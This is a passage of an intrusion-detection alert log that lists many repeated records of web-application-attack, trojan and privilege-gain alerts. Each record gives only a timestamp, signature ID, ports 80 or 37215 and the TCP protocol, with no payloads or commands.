              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.239148
              SID:2030092
              Source Port:36520
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252427
              SID:2829579
              Source Port:49906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241576
              SID:2025883
              Source Port:45266
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.261120
              SID:2829579
              Source Port:48334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239684
              SID:2030092
              Source Port:40992
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253466
              SID:2835222
              Source Port:45918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241504
              SID:2030092
              Source Port:54708
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.240566
              SID:2030092
              Source Port:41472
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.274024
              SID:2835222
              Source Port:52602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252981
              SID:2835222
              Source Port:60494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267406
              SID:2030092
              Source Port:51734
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240024
              SID:2025883
              Source Port:55394
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.240600
              SID:2030092
              Source Port:38122
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253940
              SID:2835222
              Source Port:36686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266193
              SID:2030092
              Source Port:40980
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.233813
              SID:2829579
              Source Port:49364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254035
              SID:2835222
              Source Port:50018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239931
              SID:2030092
              Source Port:35692
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254785
              SID:2835222
              Source Port:36170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246876
              SID:2030092
              Source Port:49412
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.267759
              SID:2030092
              Source Port:53386
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.308485
              SID:2835222
              Source Port:56528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.237830
              SID:2025883
              Source Port:36480
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.306951
              SID:2835222
              Source Port:48620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251939
              SID:2829579
              Source Port:35612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275477
              SID:2829579
              Source Port:45632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256497
              SID:2835222
              Source Port:34852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246254
              SID:2030092
              Source Port:32796
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241304
              SID:2025883
              Source Port:42066
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.246905
              SID:2030092
              Source Port:35964
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.255398
              SID:2030092
              Source Port:43720
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.260064
              SID:2829579
              Source Port:42688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.257008
              SID:2829579
              Source Port:58146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254230
              SID:2829579
              Source Port:49224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262933
              SID:2835222
              Source Port:43420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.288115
              SID:2835222
              Source Port:54864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240843
              SID:2025883
              Source Port:40970
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253499
              SID:2835222
              Source Port:34684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265864
              SID:2030092
              Source Port:46648
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253835
              SID:2835222
              Source Port:50112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252052
              SID:2835222
              Source Port:53482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261312
              SID:2835222
              Source Port:35684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.306706
              SID:2829579
              Source Port:37724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.263597
              SID:2829579
              Source Port:37740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267233
              SID:2030092
              Source Port:40240
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253014
              SID:2829579
              Source Port:55216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254747
              SID:2829579
              Source Port:45572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308000
              SID:2829579
              Source Port:39248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.247074
              SID:2025883
              Source Port:45146
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.247394
              SID:2025883
              Source Port:44764
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.251867
              SID:2835222
              Source Port:53694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274736
              SID:2835222
              Source Port:40134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238041
              SID:2030092
              Source Port:49670
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.265584
              SID:2030092
              Source Port:42754
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241186
              SID:2030092
              Source Port:42926
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254586
              SID:2835222
              Source Port:54026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265445
              SID:2030092
              Source Port:56144
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246425
              SID:2025883
              Source Port:54018
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.238312
              SID:2030092
              Source Port:59816
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240726
              SID:2025883
              Source Port:50846
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.238282
              SID:2030092
              Source Port:55598
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241698
              SID:2025883
              Source Port:40300
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.274578
              SID:2835222
              Source Port:48220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274916
              SID:2829579
              Source Port:46990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267260
              SID:2030092
              Source Port:57372
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.240296
              SID:2025883
              Source Port:44588
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.251978
              SID:2835222
              Source Port:51176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307218
              SID:2829579
              Source Port:51982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256554
              SID:2835222
              Source Port:51224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255441
              SID:2835222
              Source Port:52168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240427
              SID:2025883
              Source Port:34260
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.287004
              SID:2025883
              Source Port:39420
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.254181
              SID:2829579
              Source Port:44086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259864
              SID:2835222
              Source Port:38666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267520
              SID:2030092
              Source Port:52308
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.273878
              SID:2829579
              Source Port:60218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274063
              SID:2829579
              Source Port:49540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238961
              SID:2025883
              Source Port:37350
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.254703
              SID:2030092
              Source Port:42576
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241108
              SID:2030092
              Source Port:52008
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.308137
              SID:2829579
              Source Port:48752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.237476
              SID:2030092
              Source Port:35232
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.251240
              SID:2829579
              Source Port:38612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240357
              SID:2025883
              Source Port:59202
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.251351
              SID:2835222
              Source Port:45328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266794
              SID:2030092
              Source Port:51872
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.238864
              SID:2030092
              Source Port:40456
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.259707
              SID:2835222
              Source Port:42860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252650
              SID:2835222
              Source Port:35458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255507
              SID:2835222
              Source Port:57296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260121
              SID:2835222
              Source Port:45602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238523
              SID:2025883
              Source Port:58026
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.252766
              SID:2829579
              Source Port:55648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253117
              SID:2829579
              Source Port:51976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239895
              SID:2030092
              Source Port:38226
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.261655
              SID:2835222
              Source Port:57692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274702
              SID:2829579
              Source Port:52758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274543
              SID:2829579
              Source Port:38888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238344
              SID:2030092
              Source Port:46754
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.266378
              SID:2030092
              Source Port:42736
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.237601
              SID:2030092
              Source Port:44574
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.260550
              SID:2829579
              Source Port:58116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253777
              SID:2829579
              Source Port:52106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241837
              SID:2025883
              Source Port:57174
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.306901
              SID:2829579
              Source Port:34652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274833
              SID:2835222
              Source Port:46780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256689
              SID:2835222
              Source Port:52956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240458
              SID:2025883
              Source Port:35078
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.254680
              SID:2025883
              Source Port:34716
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.267159
              SID:2030092
              Source Port:48974
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.233750
              SID:2829579
              Source Port:34658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.268402
              SID:2030092
              Source Port:50962
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.256369
              SID:2829579
              Source Port:51756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261573
              SID:2835222
              Source Port:60606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.306780
              SID:2835222
              Source Port:50380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239606
              SID:2025883
              Source Port:48026
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.307768
              SID:2829579
              Source Port:49984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251240
              SID:2835222
              Source Port:38612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256774
              SID:2835222
              Source Port:54536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274187
              SID:2835222
              Source Port:35414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251665
              SID:2835222
              Source Port:43196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254997
              SID:2829579
              Source Port:40604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245427
              SID:2030092
              Source Port:59018
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.288088
              SID:2829579
              Source Port:53796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238850
              SID:2030092
              Source Port:34456
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252942
              SID:2835222
              Source Port:44394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.263544
              SID:2835222
              Source Port:34470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.268432
              SID:2030092
              Source Port:42592
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.259198
              SID:2829579
              Source Port:57288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.237679
              SID:2030092
              Source Port:48530
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.256631
              SID:2829579
              Source Port:37794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266499
              SID:2030092
              Source Port:48428
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275349
              SID:2829579
              Source Port:44912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274432
              SID:2835222
              Source Port:38934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238244
              SID:2030092
              Source Port:44946
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246669
              SID:2025883
              Source Port:35082
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.274865
              SID:2829579
              Source Port:43694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251517
              SID:2829579
              Source Port:52998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246748
              SID:2030092
              Source Port:37954
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.255398
              SID:2025883
              Source Port:43720
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.240199
              SID:2030092
              Source Port:37886
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246777
              SID:2030092
              Source Port:42388
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253661
              SID:2829579
              Source Port:55562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266444
              SID:2030092
              Source Port:43606
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.255075
              SID:2835222
              Source Port:39874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.247100
              SID:2030092
              Source Port:54366
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307705
              SID:2829579
              Source Port:40474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256025
              SID:2829579
              Source Port:34408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246301
              SID:2030092
              Source Port:48698
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275164
              SID:2829579
              Source Port:58472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251379
              SID:2835222
              Source Port:36386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238074
              SID:2030092
              Source Port:55982
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307739
              SID:2835222
              Source Port:41044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.258740
              SID:2835222
              Source Port:49574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260455
              SID:2835222
              Source Port:41000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241651
              SID:2030092
              Source Port:40554
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.263479
              SID:2835222
              Source Port:55144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255124
              SID:2829579
              Source Port:35932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307866
              SID:2829579
              Source Port:57742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239777
              SID:2025883
              Source Port:49860
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.254354
              SID:2829579
              Source Port:60452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239158
              SID:2025883
              Source Port:48614
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.239397
              SID:2030092
              Source Port:48212
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253587
              SID:2835222
              Source Port:58096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240252
              SID:2030092
              Source Port:50940
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254379
              SID:2835222
              Source Port:34226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253466
              SID:2829579
              Source Port:45918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265687
              SID:2030092
              Source Port:44260
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.256857
              SID:2829579
              Source Port:57300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252900
              SID:2835222
              Source Port:39892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239470
              SID:2030092
              Source Port:47694
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.240104
              SID:2025883
              Source Port:42682
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.239284
              SID:2025883
              Source Port:53154
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.239740
              SID:2025883
              Source Port:60104
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.274322
              SID:2829579
              Source Port:53616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.305703
              SID:2829579
              Source Port:60002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254304
              SID:2829579
              Source Port:38486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245293
              SID:2030092
              Source Port:50556
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.306047
              SID:2829579
              Source Port:46258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274295
              SID:2829579
              Source Port:36022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.268346
              SID:2030092
              Source Port:38108
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.239857
              SID:2025883
              Source Port:43072
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253312
              SID:2829579
              Source Port:56290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.288192
              SID:2829579
              Source Port:53054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.305939
              SID:2835222
              Source Port:40892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.254180
              SID:2025883
              Source Port:45154
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.238016
              SID:2030092
              Source Port:60742
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.254604
              SID:2030092
              Source Port:51930
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.251572
              SID:2835222
              Source Port:45586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254529
              SID:2835222
              Source Port:49572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308432
              SID:2829579
              Source Port:59848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260926
              SID:2829579
              Source Port:54010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238913
              SID:2025883
              Source Port:33194
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.238939
              SID:2030092
              Source Port:49564
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.239435
              SID:2030092
              Source Port:44378
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.245977
              SID:2025883
              Source Port:39866
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.240541
              SID:2025883
              Source Port:54536
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253534
              SID:2835222
              Source Port:43954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.305831
              SID:2835222
